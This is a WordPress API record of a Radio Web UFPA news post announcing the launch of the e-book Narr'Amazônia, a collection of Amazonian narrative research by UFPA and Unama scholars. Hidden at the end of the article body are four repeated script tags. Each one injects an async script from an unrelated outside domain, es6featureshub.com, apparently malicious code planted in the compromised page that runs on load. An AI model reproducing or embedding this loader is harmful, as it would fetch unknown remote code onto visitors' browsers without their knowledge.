{"id":10129,"date":"2022-04-07T14:20:53","date_gmt":"2022-04-07T17:20:53","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=10129"},"modified":"2025-10-21T13:19:19","modified_gmt":"2025-10-21T16:19:19","slug":"livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/","title":{"rendered":"Livro sobre narrativas amaz\u00f4nicas ser\u00e1 lan\u00e7ado em formato de e-book"},"content":{"rendered":"\n<p class=\"has-text-align-left\">No dia 8 de abril, \u00e0s 15h30, no audit\u00f3rio D-200 da Universidade da Amaz\u00f4nia (Unama),<br>ocorrer\u00e1 o lan\u00e7amento do e-book Narr\u2019Amaz\u00f4nia: modos de ser e estar no mundo. O livro<br>\u00e9 a reuni\u00e3o das atividades desenvolvidas no grupo de estudos e pesquisas Narrativas<br>Contempor\u00e2neas na Amaz\u00f4nia (Narramaz\u00f4nia) que tem como objetivo estimular debates<br>a respeito da constitui\u00e7\u00e3o das narrativas presentes na sociedade amaz\u00f4nica<\/p>\n\n\n\n<p class=\"has-text-align-left\">Organizada pelas professoras Alda Cristina Costa e V\u00e2nia Torres Costa do PPGCOM da<br>Universidade Federal do Par\u00e1 (UFPA) e pelo professor Paulo Nunes do Programa de P\u00f3s Gradua\u00e7\u00e3o em Comunica\u00e7\u00e3o, Linguagens e Cultura (PPGCLC) da Unama, a obra \u00e9 uma<br>colet\u00e2nea de 20 artigos oriundos de pesquisas de 24 autores. Os trabalhos s\u00e3o de natureza<br>interdisciplinar, unindo diversos campos de conhecimento como Comunica\u00e7\u00e3o, Letras,<br>Literatura, Arte e \u00e1reas afins. O livro possui como base a constru\u00e7\u00e3o de uma reflex\u00e3o<br>cr\u00edtica sobre as narrativas geradas pelos indiv\u00edduos e suas viv\u00eancias na regi\u00e3o.<\/p>\n\n\n\n<p class=\"has-text-align-left\">Dividido em duas partes, o e-book apresenta an\u00e1lises de estudos cient\u00edficos dos<br>integrantes do Narramaz\u00f4nia e experi\u00eancias narrativas de convidados importantes que<br>fazem parte da hist\u00f3ria do grupo de pesquisa. Ao tornar p\u00fablico esse conjunto de vozes,<br>a obra pretende convidar a sociedade a conhecer a Amaz\u00f4nia a partir de outra perspectiva<br>que, historicamente, se constituiu quase como um pa\u00eds apartado do Brasil. Al\u00e9m disso, o<br>livro busca auxiliar na observa\u00e7\u00e3o das narrativas como componentes de identidades e<br>campos de negocia\u00e7\u00e3o de discursos que circulam na localidade.<\/p>\n\n\n\n<p class=\"has-text-align-left\">Sobre o Narramaz\u00f4nia \u2013 O grupo de estudos e pesquisas Narrativas Contempor\u00e2neas na<br>Amaz\u00f4nia (Narramaz\u00f4nia) foi implantado em outubro de 2015 e \u00e9 registrado junto ao<br>Diret\u00f3rio de Grupos de Pesquisas do Conselho Nacional de Desenvolvimento Cient\u00edfico<br>e Tecnol\u00f3gico (CNPq). O Narramaz\u00f4nia \u00e9 realizado em parceria entre a Universidade<br>Federal do Par\u00e1 (UFPA) e Universidade da Amaz\u00f4nia (UNAMA), institui\u00e7\u00f5es localizadas<br>no estado do Par\u00e1, Amaz\u00f4nia Oriental brasileira. O grupo integra a Rede de Narrativas<br>Midi\u00e1ticas (Renami), ligada \u00e0 Associa\u00e7\u00e3o Brasileira de Pesquisadores em Jornalismo<br>(SBPJor) e, atualmente, \u00e9 composto por cerca de 30 integrantes, configurando-se como<br>um espa\u00e7o de reflex\u00f5es, estudos e pesquisas multi e transdisciplinar sobre a forma\u00e7\u00e3o e<br>circula\u00e7\u00e3o de narrativas na sociedade amaz\u00f4nica.<\/p>\n\n\n\n<p class=\"has-text-align-left\"><strong>SERVI\u00c7O<\/strong><br>Lan\u00e7amento do e-book Narr\u2019Amaz\u00f4nia: modos de ser e estar no mundo<br>Data: 8 de abril de 2022<br>Hora: 15h30<br>Local: Audit\u00f3rio D-200 da Universidade da Amaz\u00f4nia (Unama), Campus Alcindo<br>Cacela, localizada na Av. Alcindo Cacela, 287 &#8211; Umarizal, Bel\u00e9m<\/p>\n\n\n\n<p class=\"has-text-align-left\">Texto e Imagem: Divulga\u00e7\u00e3o <\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Livro sobre narrativas amaz\u00f4nicas ser\u00e1 lan\u00e7ado em formato de e-book\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/\" aria-label=\"Read more about Livro sobre narrativas amaz\u00f4nicas ser\u00e1 lan\u00e7ado em formato de e-book\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":10134,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_monsterinsights_skip_tracking":false,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[696],"tags":[],"class_list":["post-10129","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-noticias"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Livro sobre narrativas amaz\u00f4nicas ser\u00e1 lan\u00e7ado em formato de e-book - Radio Web UFPA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Livro sobre narrativas amaz\u00f4nicas ser\u00e1 lan\u00e7ado em formato de e-book - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"... Ler mais\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2022-04-07T17:20:53+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T16:19:19+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/04\/narramazonia-escuro.png?fit=1024%2C1280&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"1280\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"Livro sobre narrativas amaz\u00f4nicas ser\u00e1 lan\u00e7ado em formato de e-book\",\"datePublished\":\"2022-04-07T17:20:53+00:00\",\"dateModified\":\"2025-10-21T16:19:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/\"},\"wordCount\":438,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/04\/narramazonia-escuro.png?fit=1024%2C1280&ssl=1\",\"articleSection\":[\"UFPA Not\u00edcias\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/\",\"name\":\"Livro sobre narrativas amaz\u00f4nicas ser\u00e1 lan\u00e7ado em formato de e-book - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/04\/narramazonia-escuro.png?fit=1024%2C1280&ssl=1\",\"datePublished\":\"2022-04-07T17:20:53+00:00\",\"dateModified\":\"2025-10-21T16:19:19+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/04\/narramazonia-escuro.png?fit=1024%2C1280&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/04\/narramazonia-escuro.png?fit=1024%2C1280&ssl=1\",\"width\":1024,\"height\":1280,\"caption\":\"narramaz\u00f4nia\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Livro sobre narrativas amaz\u00f4nicas ser\u00e1 lan\u00e7ado em formato de e-book\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/cropped-images-removebg-preview-1.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/cropped-images-removebg-preview-1.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Livro sobre narrativas amaz\u00f4nicas ser\u00e1 lan\u00e7ado em formato de e-book - Radio Web UFPA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/","og_locale":"pt_BR","og_type":"article","og_title":"Livro sobre narrativas amaz\u00f4nicas ser\u00e1 lan\u00e7ado em formato de e-book - Radio Web UFPA","og_description":"... Ler mais","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2022-04-07T17:20:53+00:00","article_modified_time":"2025-10-21T16:19:19+00:00","og_image":[{"width":1024,"height":1280,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/04\/narramazonia-escuro.png?fit=1024%2C1280&ssl=1","type":"image\/png"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"Livro sobre narrativas amaz\u00f4nicas ser\u00e1 lan\u00e7ado em formato de e-book","datePublished":"2022-04-07T17:20:53+00:00","dateModified":"2025-10-21T16:19:19+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/"},"wordCount":438,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/04\/narramazonia-escuro.png?fit=1024%2C1280&ssl=1","articleSection":["UFPA Not\u00edcias"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/","name":"Livro sobre narrativas amaz\u00f4nicas ser\u00e1 lan\u00e7ado em formato de e-book - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/04\/narramazonia-escuro.png?fit=1024%2C1280&ssl=1","datePublished":"2022-04-07T17:20:53+00:00","dateModified":"2025-10-21T16:19:19+00:00","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/04\/narramazonia-escuro.png?fit=1024%2C1280&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/04\/narramazonia-escuro.png?fit=1024%2C1280&ssl=1","width":1024,"height":1280,"caption":"narramaz\u00f4nia"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/livro-sobre-narrativas-amazonicas-sera-lancado-em-formato-de-e-book\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Livro sobre narrativas amaz\u00f4nicas ser\u00e1 lan\u00e7ado em formato de e-book"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/cropped-images-removebg-preview-1.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/cropped-images-removebg-preview-1.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/04\/narramazonia-escuro.png?fit=1024%2C1280&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-2Dn","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/10129","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=10129"}],"version-history":[{"count":6,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/10129\/revisions"}],"predecessor-version":[{"id":17892,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/10129\/revisions\/17892"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/10134"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=10129"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=10129"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=10129"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}